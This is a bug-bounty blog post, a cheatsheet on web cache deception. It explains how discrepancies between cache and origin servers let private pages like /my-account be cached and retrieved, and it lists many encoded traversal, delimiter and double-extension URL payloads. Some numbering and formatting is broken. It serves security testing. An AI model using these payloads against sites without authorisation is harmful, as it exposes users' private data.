Post

Web Cache Deception: Cheatsheet

Posted Updated
By Shervoni
3 min read
Web Cache Deception: Cheatsheet

Bug Bounty Cheatsheet: Web Cache Deception

This is a personal cheatsheet for testing potential Web Cache Deception vulnerabilities.

Key Testing Tips

  • Always verify caching behavior using X-Cache or Cache-Control headers.
  • Use encoded characters (%2f, %3b, etc.) to bypass browser-side normalization.
  • Focus on identifying discrepancies between cache servers and origin servers:
    • Does the server normalize paths?
    • Which delimiters are allowed?
    • Are static file extensions or directories cached?
    • Is the request immediately cached or processed first?
  • Use tools like Burp Suite Intruder or custom scripts to automate testing.

1. Exploiting Path Mapping Discrepancies

What is it?

Occurs when the origin server abstracts the URL path while the cache server interprets paths differently.

How to Identify

  • Add arbitrary segments (e.g., /my-account/abc) or extensions (e.g., /my-account/abc.js).
  • Observe X-Cache headers:
    • X-Cache: miss on the first request.
    • X-Cache: hit on subsequent requests if cached.

      Exploitation Examples

      1

      1. **Payload**: `/my-account/abc.js`
    • Cache interprets this as a static resource.
      1. Test Case: /robots.txt after a segment: /aaa/..%2frobots.txt.
      2. Test Case: /my-account/aaa.css.

2. Exploiting Path Delimiters

What is it?

Some characters (;, ?, %23) are treated as delimiters by the origin server but ignored by the cache server, enabling poisoning.

How to Identify

  • Test delimiters (?, ;, %23, etc.) using Intruder.
  • Check responses for 200 OK or 404.

    Exploitation Examples

    1. Payload: /my-account;%2f%2e%2e%2frobots.txt
    • Cache stores /robots.txt but serves /my-account.
      1. Test Case: /api/users;%2f%2e%2e%2fstatic.
      2. Test Case: /my-account%3bconfig.json.

3. Exploiting Origin Server Normalization

What is it?

The origin server resolves paths (e.g., ../), but the cache server doesn’t, leading to cached sensitive responses.

How to Identify

  • Add encoded traversal sequences (e.g., /aaa/..%2fmy-account).
  • Check for normalization discrepancies via X-Cache headers.

    Exploitation Examples

    1. Payload: /resources/..%2fmy-account
    • Cache stores /resources, but the origin serves /my-account.
      1. Test Case: /static/..%2fprofile.
      2. Test Case: /images/..%2fadmin.

4. Exploiting Cache Server Normalization

What is it?

The cache server normalizes paths while the origin server doesn’t, leading to exposure of sensitive dynamic content.

How to Identify

  • Add encoded traversal and observe X-Cache behavior:
    • misshit indicates caching.

      Exploitation Examples

      1

      1. **Payload**: `/my-account;%2f%2e%2e%2frobots.txt`
    • Cache normalizes /robots.txt and stores the response.
      1. Test Case: /assets/../admin.
      2. Test Case: /static/../config.

5. Exploiting Exact-Match Cache Rules

What is it?

Caches store responses for specific file names (e.g., /robots.txt) even if accessed via manipulated paths.

How to Identify

  • Test paths like /my-account/robots.txt.
  • Add traversal (..%2f) to check normalization.

    Exploitation Examples

    1. Payload: /my-account;%2f%2e%2e%2frobots.txt
    • Cache stores /robots.txt.
      1. Test Case: /api/admin/robots.txt.
      2. Test Case: /images/favicon.ico.

Expanded Testing Payloads

1. Delimiters-Based Payloads

  • /my-account?abc.js
  • /my-account;abc.js
  • /my-account#abc.js
  • /my-account%3fabc.js (%3f = ?)
  • /my-account%3babc.js (%3b = ;)

2. File Extensions-Based Payloads

  • /admin/secret.js
  • /profile/config.xml
  • /my-account/config.json

3. Encoded Path Traversal-Based Payloads

  • /static/..%2fadmin
  • /assets/%2e%2e%2fprofile
  • /resources/%252e%252e%252fconfig

4. Double Extension Payloads

  • /admin/backup.json.css
  • /api/v1/endpoint.html.js
  • /user/profile.txt.png

5. Misinterpreted File Names

  • /profile;.jpg
  • /backup?version=1.js
  • /static/admin.svg#logo

6. Combination Payloads

  • /my-account;%2f%2e%2e%2fadmin/config.json
  • /static/image?../admin.js

7. Language and Framework-Specific Payloads

  • PHP: /static/%2e%2e/admin.css
  • Python: /resources/%u002e%u002e/config
  • ASP.NET: /public/%20admin

8. Path Tricks with Query Strings

  • /my-account?api_key.js
  • /dashboard/admin.js?source=config

Testing Workflow

  1. Identify Target Endpoints:
    • Look for dynamic content like /my-account or /admin.
    • Analyze X-Cache and Cache-Control headers.
  2. Test Path Mapping:
    • Add arbitrary segments or extensions and observe responses.
  3. Test Delimiters:
    • Use characters like ;, ?, %23, %3f.
  4. Test Normalization:
    • Inject encoded traversal sequences (..%2f).
  5. Combine Findings:
    • Use mismatches to craft payloads for cache poisoning.

Quick Examples

  1. Static Cache Rules:
    • Payload: /api/users;%2f%2e%2e%2fstatic.css
  2. Delimiter Discrepancies:
    • Payload: /my-account?abc.js
  3. Normalization Exploit:
    • Payload: /resources/..%2fadmin

Final Notes

  • Tailor payloads to the application’s framework and cache configuration.
  • Automate testing using wordlists and tools like Burp Intruder.
  • Always check caching headers (X-Cache, Cache-Control) to confirm behavior.
Cheatsheets
Cheatsheet
This post is licensed under CC BY 4.0 by the author.